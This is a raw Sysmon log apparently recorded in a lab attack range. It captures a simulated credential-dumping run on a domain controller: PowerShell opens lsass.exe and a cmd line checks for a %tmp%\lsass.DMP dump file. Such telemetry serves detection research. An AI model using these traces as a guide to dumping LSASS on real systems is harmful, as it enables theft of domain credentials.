15:52:53.864{D28789B6-7CCC-5FA1-C800-000000008801}31001104C:\Windows\system32\conhost.exe{D28789B6-7CD5-5FA1-E100-000000008801}4132C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004509Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.864{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004508Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.864{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004507Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.864{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004506Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.864{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004505Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.864{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004504Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.848{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004503Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.848{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004502Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.848{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004501Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.848{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004500Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.848{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CD5-5FA1-E100-000000008801}4132C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004499Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.848{D28789B6-7CD5-5FA1-E000-000000008801}46121244C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CD5-5FA1-E100-000000008801}4132C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+e76237b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+dc03205|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+dc02ed6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+e6b453b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+dbc3a6c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+dc21f3b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+dc055a0|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+dc055a0|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+dc05431|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+dbf73b6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+dc038e9|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+dc03485|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+dc03205|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+dc02ed6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+e6b453b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+dbc3a6c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+dc21f3b 154100x80000000000000004498Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.862{D28789B6-7CD5-5FA1-E100-000000008801}4132C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "if not exist %%tmp%%\lsass.DMP (exit /b 1)"C:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{D28789B6-7CCC-5FA1-4F36-080000000000}0x8364f0HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7CD5-5FA1-E000-000000008801}4612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {cmd /c \""if not exist %tmp%\lsass.DMP (exit /b 1)\""} 354300x80000000000000004497Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.562{D28789B6-7CD4-5FA1-DE00-000000008801}3648C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-807.attackrange.local50345-false140.82.121.3lb-140-82-121-3-fra.github.com443https 10341000x80000000000000004496Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.801{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7CD5-5FA1-E000-000000008801}4612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004495Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.801{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7CD5-5FA1-E000-000000008801}4612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000004494Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.770{D28789B6-7CD5-5FA1-E000-000000008801}4612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_nrmego51.3nr.ps12020-11-03 15:52:53.770 10341000x80000000000000004493Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.754{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7CD5-5FA1-E000-000000008801}4612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004492Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.723{D28789B6-7CCC-5FA1-C800-000000008801}31001104C:\Windows\system32\conhost.exe{D28789B6-7CD5-5FA1-E000-000000008801}4612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004491Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.723{D28789B6-7CCD-5FA1-CF00-000000008801}35644496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CD5-5FA1-E000-000000008801}4612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3ed3|UNKNOWN(00007FF8DCAD8A03) 10341000x80000000000000004490Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.723{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004489Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.723{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004488Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.723{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004487Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.723{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004486Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.723{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004485Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 